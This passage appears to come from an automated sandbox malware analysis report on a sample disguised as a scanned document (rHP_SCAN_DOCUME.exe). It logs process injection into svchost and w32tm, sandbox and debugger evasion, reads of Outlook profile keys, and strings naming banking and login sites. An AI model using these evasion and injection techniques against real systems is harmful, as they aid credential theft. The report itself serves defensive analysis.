Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\w32tm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\w32tm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: rHP_SCAN_DOCUME.exe

Static file information: File size 1602560 > 1048576

Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rHP_SCAN_DOCUME.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rHP_SCAN_DOCUME.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: w32tm.pdb source: svchost.exe, 00000002.00000003.1602100399.0000000003241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1601320456.000000000322C000.00000004.00000020.00020000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000002.3915169148.0000000001128000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CdarBkjFTHWBQ.exe, 00000003.00000000.1558648582.0000000000F7E000.00000002.00000001.01000000.00000004.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000000.1705240217.0000000000F7E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1459098048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, rHP_SCAN_DOCUME.exe, 00000000.00000003.1459341814.0000000003820000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538445133.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536515595.0000000003400000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1635272552.000000000320C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.0000000003560000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1637760556.00000000033BA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rHP_SCAN_DOCUME.exe, 00000000.00000003.1459098048.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, rHP_SCAN_DOCUME.exe, 00000000.00000003.1459341814.0000000003820000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1635421646.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1538445133.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1635421646.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1536515595.0000000003400000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 00000004.00000003.1635272552.000000000320C000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.0000000003560000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3921835115.00000000036FE000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 00000004.00000003.1637760556.00000000033BA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: w32tm.exe, 00000004.00000002.3911116744.0000000002F24000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1937137809.000000001BB9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: w32tm.exe, 00000004.00000002.3911116744.0000000002F24000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000004.00000002.3923068718.0000000003B8C000.00000004.10000000.00040000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000006.00000002.3921887790.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1937137809.000000001BB9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: w32tm.pdbGCTL source: svchost.exe, 00000002.00000003.1602100399.0000000003241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1601320456.000000000322C000.00000004.00000020.00020000.00000000.sdmp, CdarBkjFTHWBQ.exe, 00000003.00000002.3915169148.0000000001128000.00000004.00000020.00020000.00000000.sdmp

Source: rHP_SCAN_DOCUME.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rHP_SCAN_DOCUME.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rHP_SCAN_DOCUME.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rHP_SCAN_DOCUME.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rHP_SCAN_DOCUME.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008142DE

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00830A76 push ecx; ret	0_2_00830A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401911 push esp; ret	2_2_0040191D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401922 push esp; ret	2_2_00401927
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403320 push eax; ret	2_2_00403322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411CCB push es; retf	2_2_00411CD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411E14 push cs; retf	2_2_00411E1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004176E6 push esp; retf	2_2_004176EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380225F pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038027FA pushad ; ret	2_2_038027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx	2_2_038309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0380283D push eax; iretd	2_2_03802858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03801368 push eax; iretd	2_2_03801369
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_03A0206A push esp; retf	3_2_03A02073
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039FC798 push cs; retf	3_2_039FC7A0
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe	Code function: 3_2_039FC64F push es; retf	3_2_039FC65C
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0356225F pushad ; ret	4_2_035627F9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035627FA pushad ; ret	4_2_035627F9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_035909AD push ecx; mov dword ptr [esp], ecx	4_2_035909B6
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0356283D push eax; iretd	4_2_03562858
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0356135E push eax; iretd	4_2_03561369
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E743C3 push esp; retf	4_2_02E743CC
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6EAF1 push cs; retf	4_2_02E6EAF9
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E7C858 pushfd ; ret	4_2_02E7C85A
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E6E9A8 push es; retf	4_2_02E6E9B5
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347D30B push edi; retf	4_2_0347D310
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347B3E9 push FAEDBBA1h; ret	4_2_0347B3F1
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03485142 push eax; ret	4_2_03485144
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347C1D1 push ebx; retf	4_2_0347C1D2
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347D639 push esp; retf	4_2_0347D645
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_0347A6DA push eax; iretd	4_2_0347A6DF
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_03474B94 push edx; retf	4_2_03474BB5

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0082F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0082F98E
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_008A1C41

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-97572

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	API/Special instruction interceptor: Address: 1074AAC
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\w32tm.exe	API/Special instruction interceptor: Address: 7FFBCB7ADA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\w32tm.exe	Window / User API: threadDelayed 3607			Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Window / User API: threadDelayed 6366			Jump to behavior

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\w32tm.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\w32tm.exe TID: 5724	Thread sleep count: 3607 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 5724	Thread sleep time: -7214000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 5724	Thread sleep count: 6366 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe TID: 5724	Thread sleep time: -12732000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe TID: 5928	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe TID: 5928	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe TID: 5928	Thread sleep time: -46500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe TID: 5928	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe TID: 5928	Thread sleep time: -41000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\w32tm.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\w32tm.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0084C2A2 FindFirstFileExW,	0_2_0084C2A2
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_008868EE FindFirstFileW,FindClose,	0_2_008868EE
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0088698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0088698F
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0087D076
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0087D3A9
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00889642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00889642
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0088979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0088979D
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_0087DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0087DBBE
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00889B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00889B2B
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00885C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00885C97
Source: C:\Windows\SysWOW64\w32tm.exe	Code function: 4_2_02E7CAA0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02E7CAA0

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008142DE

Source: 78-E5648.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: 78-E5648.4.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 78-E5648.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 78-E5648.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 78-E5648.4.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 78-E5648.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 78-E5648.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 78-E5648.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 78-E5648.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: w32tm.exe, 00000004.00000002.3911116744.0000000002F24000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: firefox.exe, 00000008.00000002.1938633258.000001F35BA6D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu
Source: 78-E5648.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 78-E5648.4.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 78-E5648.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 78-E5648.4.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 78-E5648.4.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 78-E5648.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 78-E5648.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: CdarBkjFTHWBQ.exe, 00000006.00000002.3916313414.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 78-E5648.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 78-E5648.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 78-E5648.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\w32tm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0387096E rdtsc

2_2_0387096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417D03 LdrLoadDll,

2_2_00417D03

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_0088EAA2 BlockInput,

0_2_0088EAA2

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_00842622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00842622

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe

Code function: 0_2_008142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008142DE

Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_00834CE8 mov eax, dword ptr fs:[00000030h]	0_2_00834CE8
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_01074D18 mov eax, dword ptr fs:[00000030h]	0_2_01074D18
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_01074D78 mov eax, dword ptr fs:[00000030h]	0_2_01074D78
Source: C:\Users\user\Desktop\rHP_SCAN_DOCUME.exe	Code function: 0_2_010736E8 mov eax, dword ptr fs:[00000030h]	0_2_010736E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]	2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]	2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]	2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]	2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]	2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]	2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]	2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]	2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]	2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0384E3F0
